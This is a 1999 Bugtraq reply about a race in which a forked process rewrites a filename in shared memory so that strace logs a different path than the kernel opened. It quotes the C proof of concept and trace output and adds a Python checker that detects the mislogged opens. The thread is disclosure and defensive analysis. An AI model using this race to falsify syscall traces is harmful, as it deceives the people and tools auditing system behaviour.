[13116] in bugtraq


Re: strace can lie

daemon@ATHENA.MIT.EDU (Sampo Savolainen)
Tue Dec 28 10:44:06 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.3.96.991228125947.10293C-100000@cristobal>
Date:         Tue, 28 Dec 1999 13:24:45 +0200
Reply-To: Sampo Savolainen <v2@moontv.fi>
From: Sampo Savolainen <v2@MOONTV.FI>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <19991225230452.C114@bug.ucw.cz>

On Sat, 25 Dec 1999, Pavel Machek wrote:

> #include <fcntl.h>
> #include <string.h>
> #include <sys/mman.h>
> #include <unistd.h>
>
> int
> main(void)
> {
>   /* fixed address for the shared page; parent and child see the same bytes */
>   char *c = (char *)0x94000000;
>   int fd = open( "/tmp/delme", O_RDWR | O_CREAT, 0600 );
>   ftruncate( fd, 4096 );   /* backing file must cover the mapped page */
>   mmap( c, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, fd, 0);
>   *c = 0;
>   if (fork()) {
>     /* parent: keep rewriting the path in the shared page */
>     while(1) {
>       strcpy( c, "/public" );
>       strcpy( c, "/secret" );
>     }
>   } else
>     /* child: open whatever the page holds right now; strace reads the
>        name from this memory, not from what the kernel actually used */
>     while (1)
>       open( c, 0 );
> }

> [pid   224] open("/public", O_RDONLY)  = 718
> [pid   224] open("/secret", O_RDONLY)  = 719
> [pid   224] open("/public", O_RDONLY)  = 720

I tried this with Linux 2.3.20; it worked fine:

cristobal:~# ls -l /secret /public
-rw-rw-r--   1 root     root            7 Dec 28 13:17 /public
--w--w----   1 root     root            7 Dec 28 13:17 /secret

and the strace log:

[pid 10999] open("/public", O_RDONLY)   = 192
[pid 10999] open("/secret", O_RDONLY)   = -1 EACCES (Permission denied)

...most of the time.

From 1270 attempted opens, 11 had the wrong filename read from memory.

Does the kernel save the filename anywhere in the file descriptor arrays?
If it does, then strace could be easily modified to read the filename from
the kernel, not from the program's userspace.

------------------------------------------------------------------------------
v2 - Sampo Savolainen - 040 7555649       Saraxa Media / Finngemma Tuotanto Oy
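Sampo's check above works because /secret cannot be read by the traced process, so a logged open("/secret") that returns a file descriptor (or a logged open("/public") that returns EACCES) can only mean strace printed a name the kernel never used. The following is an added example, not code from either post: a small checker that applies that cross-check to strace output in the format quoted above, against a constructed permission map and constructed sample log lines.

```python
import re

# Matches strace open() lines as quoted in the thread, e.g.
#   [pid 10999] open("/secret", O_RDONLY)   = -1 EACCES (Permission denied)
OPEN_RE = re.compile(
    r'^\[pid\s+(?P<pid>\d+)\]\s+open\("(?P<path>[^"]*)",\s*(?P<flags>[^)]*)\)\s*='
    r'\s*(?P<ret>-?\d+)(?:\s+(?P<errno>E[A-Z]+))?'
)


def parse_open_line(line):
    """Return {pid, path, ret, errno} for an strace open() line, else None."""
    m = OPEN_RE.match(line.strip())
    if not m:
        return None
    return {"pid": int(m.group("pid")), "path": m.group("path"),
            "ret": int(m.group("ret")), "errno": m.group("errno")}


def find_inconsistent_opens(log_lines, readable):
    """readable maps path -> whether the traced process may open it read-only
    (Sampo's setup: /public is mode 664, /secret is mode 220 and unreadable).
    Returns the entries whose logged name contradicts the kernel's verdict,
    i.e. the lines where strace reported a name the kernel did not open."""
    suspicious = []
    for line in log_lines:
        rec = parse_open_line(line)
        if rec is None or rec["path"] not in readable:
            continue
        succeeded = rec["ret"] >= 0
        if succeeded and not readable[rec["path"]]:
            rec["reason"] = "success on unreadable path"
            suspicious.append(rec)
        elif not succeeded and rec["errno"] == "EACCES" and readable[rec["path"]]:
            rec["reason"] = "EACCES on readable path"
            suspicious.append(rec)
    return suspicious


# Constructed sample log; lines 3 and 4 are the kind of entries the race
# produces (kernel opened one file while strace printed the other's name).
SAMPLE_LOG = [
    '[pid 10999] open("/public", O_RDONLY)   = 192',
    '[pid 10999] open("/secret", O_RDONLY)   = -1 EACCES (Permission denied)',
    '[pid 10999] open("/secret", O_RDONLY)   = 193',
    '[pid 10999] open("/public", O_RDONLY)   = -1 EACCES (Permission denied)',
]
READABLE = {"/public": True, "/secret": False}  # constructed, per the ls -l above

if __name__ == "__main__":
    for rec in find_inconsistent_opens(SAMPLE_LOG, READABLE):
        print(rec["pid"], rec["path"], rec["ret"], rec["reason"])
```

On a real trace, build the permission map from the traced process's credentials and the files' modes; the checker only catches mismatches where the two names differ in accessibility, which is exactly what Sampo's /public versus /secret setup guarantees.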